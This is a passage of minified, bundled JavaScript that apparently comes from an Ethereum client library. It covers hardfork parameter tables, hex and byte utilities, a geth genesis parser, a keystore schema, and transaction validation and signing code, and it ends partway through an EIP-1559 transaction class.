                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "istanbul",
                    comment: "HF targeted for December 2019 following the Constantinople/Petersburg HF",
                    url: "https://eips.ethereum.org/EIPS/eip-1679",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {
                        blake2Round: {
                            v: 1,
                            d: "Gas cost per round for the Blake2 F precompile"
                        },
                        ecAdd: {
                            v: 150,
                            d: "Gas costs for curve addition precompile"
                        },
                        ecMul: {
                            v: 6e3,
                            d: "Gas costs for curve multiplication precompile"
                        },
                        ecPairing: {
                            v: 45e3,
                            d: "Base gas costs for curve pairing precompile"
                        },
                        ecPairingWord: {
                            v: 34e3,
                            d: "Gas costs regarding curve pairing precompile input length"
                        },
                        txDataNonZero: {
                            v: 16,
                            d: "Per byte of data attached to a transaction that is not equal to zero. NOTE: Not payable on data of calls between transactions"
                        },
                        sstoreSentryGasEIP2200: {
                            v: 2300,
                            d: "Minimum gas required to be present for an SSTORE call, not consumed"
                        },
                        sstoreNoopGasEIP2200: {
                            v: 800,
                            d: "Once per SSTORE operation if the value doesn't change"
                        },
                        sstoreDirtyGasEIP2200: {
                            v: 800,
                            d: "Once per SSTORE operation if a dirty value is changed"
                        },
                        sstoreInitGasEIP2200: {
                            v: 2e4,
                            d: "Once per SSTORE operation from clean zero to non-zero"
                        },
                        sstoreInitRefundEIP2200: {
                            v: 19200,
                            d: "Once per SSTORE operation for resetting to the original zero value"
                        },
                        sstoreCleanGasEIP2200: {
                            v: 5e3,
                            d: "Once per SSTORE operation from clean non-zero to something else"
                        },
                        sstoreCleanRefundEIP2200: {
                            v: 4200,
                            d: "Once per SSTORE operation for resetting to the original non-zero value"
                        },
                        sstoreClearRefundEIP2200: {
                            v: 15e3,
                            d: "Once per SSTORE operation for clearing an originally existing storage slot"
                        },
                        balance: {
                            v: 700,
                            d: "Base fee of the BALANCE opcode"
                        },
                        extcodehash: {
                            v: 700,
                            d: "Base fee of the EXTCODEHASH opcode"
                        },
                        chainid: {
                            v: 2,
                            d: "Base fee of the CHAINID opcode"
                        },
                        selfbalance: {
                            v: 5,
                            d: "Base fee of the SELFBALANCE opcode"
                        },
                        sload: {
                            v: 800,
                            d: "Base fee of the SLOAD opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            1233: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "london",
                    comment: "HF targeted for July 2021 following the Berlin fork",
                    url: "https://github.com/ethereum/eth1.0-specs/blob/master/network-upgrades/mainnet-upgrades/london.md",
                    status: "Final",
                    eips: [
                        1559,
                        3198,
                        3529,
                        3541
                    ]
                };
            },
            6668: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "merge",
                    comment: "Hardfork to upgrade the consensus mechanism to Proof-of-Stake",
                    url: "https://github.com/ethereum/execution-specs/blob/master/network-upgrades/mainnet-upgrades/merge.md",
                    status: "Final",
                    consensus: {
                        type: "pos",
                        algorithm: "casper",
                        casper: {}
                    },
                    eips: [
                        3675,
                        4399
                    ]
                };
            },
            6697: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "mergeForkIdTransition",
                    comment: "Pre-merge hardfork to fork off non-upgraded clients",
                    url: "https://eips.ethereum.org/EIPS/eip-3675",
                    status: "Draft",
                    eips: []
                };
            },
            7931: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "muirGlacier",
                    comment: "HF to delay the difficulty bomb",
                    url: "https://eips.ethereum.org/EIPS/eip-2384",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {
                        difficultyBombDelay: {
                            v: 9e6,
                            d: "the amount of blocks to delay the difficulty bomb with"
                        }
                    }
                };
            },
            5338: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "petersburg",
                    comment: "Aka constantinopleFix, removes EIP-1283, activate together with or after constantinople",
                    url: "https://eips.ethereum.org/EIPS/eip-1716",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {
                        netSstoreNoopGas: {
                            v: null,
                            d: "Removed along EIP-1283"
                        },
                        netSstoreInitGas: {
                            v: null,
                            d: "Removed along EIP-1283"
                        },
                        netSstoreCleanGas: {
                            v: null,
                            d: "Removed along EIP-1283"
                        },
                        netSstoreDirtyGas: {
                            v: null,
                            d: "Removed along EIP-1283"
                        },
                        netSstoreClearRefund: {
                            v: null,
                            d: "Removed along EIP-1283"
                        },
                        netSstoreResetRefund: {
                            v: null,
                            d: "Removed along EIP-1283"
                        },
                        netSstoreResetClearRefund: {
                            v: null,
                            d: "Removed along EIP-1283"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            2761: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "shanghai",
                    comment: "Next feature hardfork after the merge hardfork having withdrawals, warm coinbase, push0, limit/meter initcode",
                    url: "https://github.com/ethereum/execution-specs/blob/master/network-upgrades/mainnet-upgrades/shanghai.md",
                    status: "Final",
                    eips: [
                        3651,
                        3855,
                        3860,
                        4895
                    ]
                };
            },
            2546: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "spuriousDragon",
                    comment: "HF with EIPs for simple replay attack protection, EXP cost increase, state trie clearing, contract code size limit",
                    url: "https://eips.ethereum.org/EIPS/eip-607",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {
                        expByte: {
                            v: 50,
                            d: "Times ceil(log256(exponent)) for the EXP instruction"
                        }
                    },
                    vm: {
                        maxCodeSize: {
                            v: 24576,
                            d: "Maximum length of contract code"
                        }
                    },
                    pow: {}
                };
            },
            7458: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "tangerineWhistle",
                    comment: "Hardfork with gas cost changes for IO-heavy operations",
                    url: "https://eips.ethereum.org/EIPS/eip-608",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {
                        sload: {
                            v: 200,
                            d: "Once per SLOAD operation"
                        },
                        call: {
                            v: 700,
                            d: "Once per CALL operation & message call transaction"
                        },
                        extcodesize: {
                            v: 700,
                            d: "Base fee of the EXTCODESIZE opcode"
                        },
                        extcodecopy: {
                            v: 700,
                            d: "Base fee of the EXTCODECOPY opcode"
                        },
                        balance: {
                            v: 400,
                            d: "Base fee of the BALANCE opcode"
                        },
                        delegatecall: {
                            v: 700,
                            d: "Base fee of the DELEGATECALL opcode"
                        },
                        callcode: {
                            v: 700,
                            d: "Base fee of the CALLCODE opcode"
                        },
                        selfdestruct: {
                            v: 5e3,
                            d: "Base fee of the SELFDESTRUCT opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            8317: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), i(r(6664), t), i(r(4443), t), i(r(850), t), i(r(2290), t);
            },
            850: (e, t)=>{
                "use strict";
                var r;
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.TypeOutput = void 0, (r = t.TypeOutput || (t.TypeOutput = {}))[r.Number = 0] = "Number", r[r.BigInt = 1] = "BigInt", r[r.Uint8Array = 2] = "Uint8Array", r[r.PrefixedHexString = 3] = "PrefixedHexString";
            },
            2290: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.toType = t.ecrecover = t.bigIntToUnpaddedUint8Array = t.bigIntToHex = t.unpadUint8Array = t.stripZeros = t.setLengthLeft = t.assertIsUint8Array = t.zeros = t.bigIntToUint8Array = t.uint8ArrayToBigInt = t.toUint8Array = t.intToUint8Array = t.padToEven = t.parseGethGenesis = t.stripHexPrefix = void 0;
                const n = r(7345), i = r(9634), o = r(4555), s = r(4443), a = r(850);
                t.stripHexPrefix = (e)=>{
                    if ("string" != typeof e) throw new Error("[stripHexPrefix] input must be type 'string', received " + typeof e);
                    return (0, n.isHexPrefixed)(e) ? e.slice(2) : e;
                };
                const u = function(e) {
                    if (!Number.isSafeInteger(e) || e < 0) throw new Error(`Received an invalid integer type: ${e}`);
                    return `0x${e.toString(16)}`;
                };
                function c(e) {
                    let t = e;
                    if ("string" != typeof t) throw new Error("[padToEven] value must be type 'string', received " + typeof t);
                    return t.length % 2 && (t = `0${t}`), t;
                }
                function l(e) {
                    const t = (0, i.bytesToHex)(e);
                    return "0x" === t ? BigInt(0) : BigInt(t);
                }
                function d(e) {
                    return (0, t.toUint8Array)(`0x${e.toString(16)}`);
                }
                function h(e) {
                    if (!(e instanceof Uint8Array)) throw new Error(`This method only supports Uint8Array but input was: ${e}`);
                }
                function f(e) {
                    let t = e[0];
                    for(; e.length > 0 && "0" === t.toString();)t = (e = e.slice(1))[0];
                    return e;
                }
                t.parseGethGenesis = function(e, r, i) {
                    try {
                        if ([
                            "config",
                            "difficulty",
                            "gasLimit",
                            "alloc"
                        ].some((t)=>!(t in e))) throw new Error("Invalid format, expected geth genesis fields missing");
                        return void 0 !== r && (e.name = r), function(e, r = !0) {
                            var i, o;
                            const { name: a, config: c, difficulty: l, mixHash: d, gasLimit: h, coinbase: f, baseFeePerGas: p } = e;
                            let { extraData: m, timestamp: g, nonce: y } = e;
                            const v = Number(g), { chainId: b } = c;
                            if ("" === m && (m = "0x"), (0, n.isHexPrefixed)(g) || (g = u(parseInt(g))), 18 !== y.length && (y = function(e) {
                                return e && "0x0" !== e ? (0, n.isHexPrefixed)(e) ? `0x${(0, t.stripHexPrefix)(e).padStart(16, "0")}` : `0x${e.padStart(16, "0")}` : "0x0000000000000000";
                            }(y)), c.eip155Block !== c.eip158Block) throw new Error("EIP155 block number must equal EIP 158 block number since both are part of SpuriousDragon hardfork and the client only supports activating the full hardfork");
                            const E = {
                                name: a,
                                chainId: b,
                                networkId: b,
                                genesis: {
                                    timestamp: g,
                                    gasLimit: parseInt(h),
                                    difficulty: parseInt(l),
                                    nonce: y,
                                    extraData: m,
                                    mixHash: d,
                                    coinbase: f,
                                    baseFeePerGas: p
                                },
                                hardfork: void 0,
                                hardforks: [],
                                bootstrapNodes: [],
                                consensus: void 0 !== c.clique ? {
                                    type: "poa",
                                    algorithm: "clique",
                                    clique: {
                                        period: null !== (i = c.clique.period) && void 0 !== i ? i : c.clique.blockperiodseconds,
                                        epoch: null !== (o = c.clique.epoch) && void 0 !== o ? o : c.clique.epochlength
                                    }
                                } : {
                                    type: "pow",
                                    algorithm: "ethash",
                                    ethash: {}
                                }
                            }, A = {
                                [s.Hardfork.Homestead]: {
                                    name: "homesteadBlock"
                                },
                                [s.Hardfork.Dao]: {
                                    name: "daoForkBlock"
                                },
                                [s.Hardfork.TangerineWhistle]: {
                                    name: "eip150Block"
                                },
                                [s.Hardfork.SpuriousDragon]: {
                                    name: "eip155Block"
                                },
                                [s.Hardfork.Byzantium]: {
                                    name: "byzantiumBlock"
                                },
                                [s.Hardfork.Constantinople]: {
                                    name: "constantinopleBlock"
                                },
                                [s.Hardfork.Petersburg]: {
                                    name: "petersburgBlock"
                                },
                                [s.Hardfork.Istanbul]: {
                                    name: "istanbulBlock"
                                },
                                [s.Hardfork.MuirGlacier]: {
                                    name: "muirGlacierBlock"
                                },
                                [s.Hardfork.Berlin]: {
                                    name: "berlinBlock"
                                },
                                [s.Hardfork.London]: {
                                    name: "londonBlock"
                                },
                                [s.Hardfork.MergeForkIdTransition]: {
                                    name: "mergeForkBlock",
                                    postMerge: r
                                },
                                [s.Hardfork.Shanghai]: {
                                    name: "shanghaiTime",
                                    postMerge: !0,
                                    isTimestamp: !0
                                },
                                [s.Hardfork.ShardingForkDev]: {
                                    name: "shardingForkTime",
                                    postMerge: !0,
                                    isTimestamp: !0
                                }
                            }, _ = Object.keys(A).reduce((e, t)=>(e[A[t].name] = t, e), {}), w = Object.keys(c).filter((e)=>void 0 !== _[e] && void 0 !== c[e] && null !== c[e]);
                            if (E.hardforks = w.map((e)=>({
                                    name: _[e],
                                    block: !0 === A[_[e]].isTimestamp || "number" != typeof c[e] ? null : c[e],
                                    timestamp: !0 === A[_[e]].isTimestamp && "number" == typeof c[e] ? c[e] : void 0
                                })).filter((e)=>null !== e.block || void 0 !== e.timestamp), E.hardforks.sort((e, t)=>{
                                var r, n;
                                return (null !== (r = e.block) && void 0 !== r ? r : 1 / 0) - (null !== (n = t.block) && void 0 !== n ? n : 1 / 0);
                            }), E.hardforks.sort((e, t)=>{
                                var r, n;
                                return (null !== (r = e.timestamp) && void 0 !== r ? r : v) - (null !== (n = t.timestamp) && void 0 !== n ? n : v);
                            }), void 0 !== c.terminalTotalDifficulty) {
                                const e = {
                                    name: s.Hardfork.Merge,
                                    ttd: c.terminalTotalDifficulty,
                                    block: null
                                }, t = E.hardforks.findIndex((e)=>{
                                    var t;
                                    return !0 === (null === (t = A[e.name]) || void 0 === t ? void 0 : t.postMerge);
                                });
                                -1 !== t ? E.hardforks.splice(t, 0, e) : E.hardforks.push(e);
                            }
                            const T = E.hardforks.length > 0 ? E.hardforks.slice(-1)[0] : void 0;
                            return E.hardfork = null == T ? void 0 : T.name, E.hardforks.unshift({
                                name: s.Hardfork.Chainstart,
                                block: 0
                            }), E;
                        }(e, i);
                    } catch (e) {
                        throw new Error(`Error parsing parameters file: ${e.message}`);
                    }
                }, t.padToEven = c, t.intToUint8Array = function(e) {
                    const t = u(e);
                    return (0, i.hexToBytes)(`0x${c(t.slice(2))}`);
                }, t.toUint8Array = function(e) {
                    if (null == e) return new Uint8Array;
                    if (e instanceof Uint8Array) return e;
                    if (Array.isArray(e)) return Uint8Array.from(e);
                    if ("string" == typeof e) {
                        if (!(0, n.isHexString)(e)) throw new Error(`Cannot convert string to Uint8Array. only supports 0x-prefixed hex strings and this string was given: ${e}`);
                        return (0, i.hexToBytes)(c((0, t.stripHexPrefix)(e)));
                    }
                    if ("number" == typeof e) return (0, t.toUint8Array)((0, i.numberToHex)(e));
                    if ("bigint" == typeof e) {
                        if (e < BigInt(0)) throw new Error(`Cannot convert negative bigint to Uint8Array. Given: ${e}`);
                        let r = e.toString(16);
                        return r.length % 2 && (r = `0${r}`), (0, t.toUint8Array)(`0x${r}`);
                    }
                    if (e.toArray) return Uint8Array.from(e.toArray());
                    throw new Error("invalid type");
                }, t.uint8ArrayToBigInt = l, t.bigIntToUint8Array = d, t.zeros = function(e) {
                    return new Uint8Array(e).fill(0);
                }, t.assertIsUint8Array = h, t.setLengthLeft = function(e, r) {
                    return h(e), function(e, r, n) {
                        const i = (0, t.zeros)(r);
                        return e.length < r ? (i.set(e, r - e.length), i) : e.subarray(-r);
                    }(e, r);
                }, t.stripZeros = f, t.unpadUint8Array = function(e) {
                    return h(e), f(e);
                }, t.bigIntToHex = (e)=>`0x${e.toString(16)}`, t.bigIntToUnpaddedUint8Array = function(e) {
                    return (0, t.unpadUint8Array)(d(e));
                }, t.ecrecover = function(e, t, r, n, i) {
                    const s = function(e, t) {
                        return e === BigInt(0) || e === BigInt(1) ? e : void 0 === t ? e - BigInt(27) : e - (t * BigInt(2) + BigInt(35));
                    }(t, i);
                    if (!function(e) {
                        return e === BigInt(0) || e === BigInt(1);
                    }(s)) throw new Error("Invalid signature v value");
                    return new o.secp256k1.Signature(l(r), l(n)).addRecoveryBit(Number(s)).recoverPublicKey(e).toRawBytes(!1).slice(1);
                }, t.toType = function(e, r) {
                    if (null === e) return null;
                    if (void 0 === e) return;
                    if ("string" == typeof e && !(0, n.isHexString)(e)) throw new Error(`A string must be provided with a 0x-prefix, given: ${e}`);
                    if ("number" == typeof e && !Number.isSafeInteger(e)) throw new Error("The provided number is greater than MAX_SAFE_INTEGER (please use an alternative input type)");
                    const o = (0, t.toUint8Array)(e);
                    switch(r){
                        case a.TypeOutput.Uint8Array:
                            return o;
                        case a.TypeOutput.BigInt:
                            return l(o);
                        case a.TypeOutput.Number:
                            {
                                const e = l(o);
                                if (e > BigInt(Number.MAX_SAFE_INTEGER)) throw new Error("The provided number is greater than MAX_SAFE_INTEGER (please use an alternative output type)");
                                return Number(e);
                            }
                        case a.TypeOutput.PrefixedHexString:
                            return (0, i.bytesToHex)(o);
                        default:
                            throw new Error("unknown outputType");
                    }
                };
            },
            9247: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), i(r(8632), t), i(r(1560), t), i(r(4874), t), i(r(5774), t), i(r(8317), t), i(r(9275), t);
            },
            5774: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.keyStoreSchema = void 0, t.keyStoreSchema = {
                    type: "object",
                    required: [
                        "crypto",
                        "id",
                        "version",
                        "address"
                    ],
                    properties: {
                        crypto: {
                            type: "object",
                            required: [
                                "cipher",
                                "ciphertext",
                                "cipherparams",
                                "kdf",
                                "kdfparams",
                                "mac"
                            ],
                            properties: {
                                cipher: {
                                    type: "string"
                                },
                                ciphertext: {
                                    type: "string"
                                },
                                cipherparams: {
                                    type: "object"
                                },
                                kdf: {
                                    type: "string"
                                },
                                kdfparams: {
                                    type: "object"
                                },
                                salt: {
                                    type: "string"
                                },
                                mac: {
                                    type: "string"
                                }
                            }
                        },
                        id: {
                            type: "string"
                        },
                        version: {
                            type: "number"
                        },
                        address: {
                            type: "string"
                        }
                    }
                };
            },
            7592: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Address = void 0;
                const n = r(7423), i = r(9634), o = r(4555), s = r(2290);
                class a {
                    constructor(e){
                        if (20 !== e.length) throw new Error("Invalid address length");
                        this.buf = e;
                    }
                    static zero() {
                        return new a((0, s.zeros)(20));
                    }
                    equals(e) {
                        return (0, i.uint8ArrayEquals)(this.buf, e.buf);
                    }
                    isZero() {
                        return this.equals(a.zero());
                    }
                    toString() {
                        return (0, i.bytesToHex)(this.buf);
                    }
                    toArray() {
                        return this.buf;
                    }
                    static publicToAddress(e, t = !1) {
                        let r = e;
                        if ((0, s.assertIsUint8Array)(r), t && 64 !== r.length && (r = o.secp256k1.ProjectivePoint.fromHex(r).toRawBytes(!1).slice(1)), 64 !== r.length) throw new Error("Expected pubKey to be of length 64");
                        return (0, n.keccak256)(r).slice(-20);
                    }
                }
                t.Address = a;
            },
            915: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.BaseTransaction = void 0;
                const n = r(9634), i = r(4555), o = r(8317), s = r(9964), a = r(7592), u = r(4562);
                t.BaseTransaction = class {
                    constructor(e, t){
                        var r, n;
                        this.cache = {
                            hash: void 0,
                            dataFee: void 0
                        }, this.activeCapabilities = [], this.DEFAULT_CHAIN = o.Chain.Mainnet, this.DEFAULT_HARDFORK = o.Hardfork.Merge;
                        const { nonce: i, gasLimit: s, to: c, value: l, data: d, v: h, r: f, s: p, type: m } = e;
                        this._type = Number((0, o.uint8ArrayToBigInt)((0, o.toUint8Array)(m))), this.txOptions = t;
                        const g = (0, o.toUint8Array)("" === c ? "0x" : c), y = (0, o.toUint8Array)("" === h ? "0x" : h), v = (0, o.toUint8Array)("" === f ? "0x" : f), b = (0, o.toUint8Array)("" === p ? "0x" : p);
                        this.nonce = (0, o.uint8ArrayToBigInt)((0, o.toUint8Array)("" === i ? "0x" : i)), this.gasLimit = (0, o.uint8ArrayToBigInt)((0, o.toUint8Array)("" === s ? "0x" : s)), this.to = g.length > 0 ? new a.Address(g) : void 0, this.value = (0, o.uint8ArrayToBigInt)((0, o.toUint8Array)("" === l ? "0x" : l)), this.data = (0, o.toUint8Array)("" === d ? "0x" : d), this.v = y.length > 0 ? (0, o.uint8ArrayToBigInt)(y) : void 0, this.r = v.length > 0 ? (0, o.uint8ArrayToBigInt)(v) : void 0, this.s = b.length > 0 ? (0, o.uint8ArrayToBigInt)(b) : void 0, this._validateCannotExceedMaxInteger({
                            value: this.value,
                            r: this.r,
                            s: this.s
                        }), this._validateCannotExceedMaxInteger({
                            gasLimit: this.gasLimit
                        }, 64), this._validateCannotExceedMaxInteger({
                            nonce: this.nonce
                        }, 64, !0);
                        const E = void 0 === this.to || null === this.to, A = null !== (r = t.allowUnlimitedInitCodeSize) && void 0 !== r && r, _ = null !== (n = t.common) && void 0 !== n ? n : this._getCommon();
                        E && _.isActivatedEIP(3860) && !A && (0, u.checkMaxInitCodeSize)(_, this.data.length);
                    }
                    get type() {
                        return this._type;
                    }
                    supports(e) {
                        return this.activeCapabilities.includes(e);
                    }
                    validate(e = !1) {
                        const t = [];
                        return this.getBaseFee() > this.gasLimit && t.push(`gasLimit is too low. given ${this.gasLimit}, need at least ${this.getBaseFee()}`), this.isSigned() && !this.verifySignature() && t.push("Invalid Signature"), e ? t : 0 === t.length;
                    }
                    _validateYParity() {
                        const { v: e } = this;
                        if (void 0 !== e && e !== BigInt(0) && e !== BigInt(1)) {
                            const e = this._errorMsg("The y-parity of the transaction should either be 0 or 1");
                            throw new Error(e);
                        }
                    }
                    _validateHighS() {
                        const { s: e } = this;
                        if (this.common.gteHardfork("homestead") && void 0 !== e && e > i.SECP256K1_ORDER_DIV_2) {
                            const e = this._errorMsg("Invalid Signature: s-values greater than secp256k1n/2 are considered invalid");
                            throw new Error(e);
                        }
                    }
                    getBaseFee() {
                        const e = this.common.param("gasPrices", "tx");
                        let t = this.getDataFee();
                        if (e && (t += e), this.common.gteHardfork("homestead") && this.toCreationAddress()) {
                            const e = this.common.param("gasPrices", "txCreation");
                            e && (t += e);
                        }
                        return t;
                    }
                    getDataFee() {
                        const e = this.common.param("gasPrices", "txDataZero"), t = this.common.param("gasPrices", "txDataNonZero");
                        let r = BigInt(0);
                        for(let n = 0; n < this.data.length; n += 1)0 === this.data[n] ? r += e : r += t;
                        if ((void 0 === this.to || null === this.to) && this.common.isActivatedEIP(3860)) {
                            const e = BigInt(Math.ceil(this.data.length / 32));
                            r += this.common.param("gasPrices", "initCodeWordCost") * e;
                        }
                        return r;
                    }
                    toCreationAddress() {
                        return void 0 === this.to || 0 === this.to.buf.length;
                    }
                    isSigned() {
                        const { v: e, r: t, s: r } = this;
                        return void 0 !== e && void 0 !== t && void 0 !== r;
                    }
                    verifySignature() {
                        try {
                            const e = this.getSenderPublicKey();
                            return 0 !== (0, o.unpadUint8Array)(e).length;
                        } catch (e) {
                            return !1;
                        }
                    }
                    getSenderAddress() {
                        return new a.Address(a.Address.publicToAddress(this.getSenderPublicKey()));
                    }
                    sign(e) {
                        if (32 !== e.length) {
                            const e = this._errorMsg("Private key must be 32 bytes in length.");
                            throw new Error(e);
                        }
                        let t = !1;
                        0 === this.type && this.common.gteHardfork("spuriousDragon") && !this.supports(s.Capability.EIP155ReplayProtection) && (this.activeCapabilities.push(s.Capability.EIP155ReplayProtection), t = !0);
                        const r = this.getMessageToSign(!0), { v: n, r: i, s: o } = this._ecsign(r, e), a = this._processSignature(n, i, o);
                        if (t) {
                            const e = this.activeCapabilities.indexOf(s.Capability.EIP155ReplayProtection);
                            e > -1 && this.activeCapabilities.splice(e, 1);
                        }
                        return a;
                    }
                    _getCommon(e, t) {
                        var r;
                        if (void 0 !== t) {
                            const r = (0, o.uint8ArrayToBigInt)((0, o.toUint8Array)(t));
                            if (e) {
                                if (e.chainId() !== r) {
                                    const e = this._errorMsg("The chain ID does not match the chain ID of Common");
                                    throw new Error(e);
                                }
                                return e.copy();
                            }
                            return o.Common.isSupportedChainId(r) ? new o.Common({
                                chain: r,
                                hardfork: this.DEFAULT_HARDFORK
                            }) : o.Common.custom({
                                name: "custom-chain",
                                networkId: r,
                                chainId: r
                            }, {
                                baseChain: this.DEFAULT_CHAIN,
                                hardfork: this.DEFAULT_HARDFORK
                            });
                        }
                        return null !== (r = null == e ? void 0 : e.copy()) && void 0 !== r ? r : new o.Common({
                            chain: this.DEFAULT_CHAIN,
                            hardfork: this.DEFAULT_HARDFORK
                        });
                    }
                    _validateCannotExceedMaxInteger(e, t = 256, r = !1) {
                        for (const [n, o] of Object.entries(e))switch(t){
                            case 64:
                                if (r) {
                                    if (void 0 !== o && o >= i.MAX_UINT64) {
                                        const e = this._errorMsg(`${n} cannot equal or exceed MAX_UINT64 (2^64-1), given ${o}`);
                                        throw new Error(e);
                                    }
                                } else if (void 0 !== o && o > i.MAX_UINT64) {
                                    const e = this._errorMsg(`${n} cannot exceed MAX_UINT64 (2^64-1), given ${o}`);
                                    throw new Error(e);
                                }
                                break;
                            case 256:
                                if (r) {
                                    if (void 0 !== o && o >= i.MAX_INTEGER) {
                                        const e = this._errorMsg(`${n} cannot equal or exceed MAX_INTEGER (2^256-1), given ${o}`);
                                        throw new Error(e);
                                    }
                                } else if (void 0 !== o && o > i.MAX_INTEGER) {
                                    const e = this._errorMsg(`${n} cannot exceed MAX_INTEGER (2^256-1), given ${o}`);
                                    throw new Error(e);
                                }
                                break;
                            default:
                                {
                                    const e = this._errorMsg("unimplemented bits value");
                                    throw new Error(e);
                                }
                        }
                    }
                    static _validateNotArray(e) {
                        const t = [
                            "nonce",
                            "gasPrice",
                            "gasLimit",
                            "to",
                            "value",
                            "data",
                            "v",
                            "r",
                            "s",
                            "type",
                            "baseFee",
                            "maxFeePerGas",
                            "chainId"
                        ];
                        for (const [r, n] of Object.entries(e))if (t.includes(r) && Array.isArray(n)) throw new Error(`${r} cannot be an array`);
                    }
                    _getSharedErrorPostfix() {
                        let e = "";
                        try {
                            e = this.isSigned() ? (0, n.bytesToHex)(this.hash()) : "not available (unsigned)";
                        } catch (t) {
                            e = "error";
                        }
                        let t = "";
                        try {
                            t = this.isSigned().toString();
                        } catch (t) {
                            e = "error";
                        }
                        let r = "";
                        try {
                            r = this.common.hardfork();
                        } catch (e) {
                            r = "error";
                        }
                        let i = `tx type=${this.type} hash=${e} nonce=${this.nonce} value=${this.value} `;
                        return i += `signed=${t} hf=${r}`, i;
                    }
                    _ecsign(e, t, r) {
                        const n = i.secp256k1.sign(e, t), o = n.toCompactRawBytes();
                        return {
                            r: o.subarray(0, 32),
                            s: o.subarray(32, 64),
                            v: void 0 === r ? BigInt(n.recovery + 27) : BigInt(n.recovery + 35) + BigInt(r) * BigInt(2)
                        };
                    }
                };
            },
            4555: function(e, t, r) {
                "use strict";
                var n, i = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), o = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), s = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && i(t, e, r);
                    return o(t, e), t;
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.SECP256K1_ORDER_DIV_2 = t.SECP256K1_ORDER = t.MAX_INTEGER = t.MAX_UINT64 = t.secp256k1 = void 0;
                const a = s(r(5473));
                t.secp256k1 = null !== (n = a.secp256k1) && void 0 !== n ? n : a, t.MAX_UINT64 = BigInt("0xffffffffffffffff"), t.MAX_INTEGER = BigInt("0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"), t.SECP256K1_ORDER = t.secp256k1.CURVE.n, t.SECP256K1_ORDER_DIV_2 = t.SECP256K1_ORDER / BigInt(2);
            },
            6135: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.FeeMarketEIP1559Transaction = void 0;
                const n = r(7423), i = r(7345), o = r(7256), s = r(9634), a = r(4555), u = r(915), c = r(4562), l = r(2290), d = (0, s.hexToBytes)(2..toString(16).padStart(2, "0"));
                class h extends u.BaseTransaction {
                    constructor(e, t = {}){
                        var r;
                        super(Object.assign(Object.assign({}, e), {
                            type: 2
                        }), t), this.DEFAULT_HARDFORK = "london";
                        const { chainId: n, accessList: i, maxFeePerGas: o, maxPriorityFeePerGas: s } = e;
                        if (this.common = this._getCommon(t.common, n), this.chainId = this.common.chainId(), !this.common.isActivatedEIP(1559)) throw new Error("EIP-1559 not enabled on Common");
                        this.activeCapabilities = this.activeCapabilities.concat([
                            1559,
                            2718,
                            2930
                        ]);
                        const d = (0, c.getAccessListData)(null != i ? i : []);
